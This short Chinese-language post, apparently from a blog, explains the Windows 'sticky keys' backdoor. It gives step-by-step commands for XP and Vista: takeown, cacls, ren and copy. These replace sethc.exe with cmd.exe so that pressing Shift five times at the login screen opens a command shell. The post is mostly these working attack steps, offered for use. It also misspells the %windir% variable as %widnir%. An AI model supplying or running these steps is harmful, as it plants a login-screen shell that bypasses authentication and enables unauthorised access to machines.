在windows 2000/xp/vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。 参考McafeeAvertLabs： http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/ XP： 将安装源光盘弹出（或将硬盘上的安装目录改名) cd %widnir%\system32\dllcache ren sethc.exe *.ex~ cd %widnir%\system32 copy /y cmd.exe sethc.exe VISTA： takeown /f c:\windows\system32\sethc.exe cacls c:\windows\system32\sethc.exe /G administrator:F 然后按XP方法替换文件 在登录界面按5此SHIFT，出来cmd shell，然后……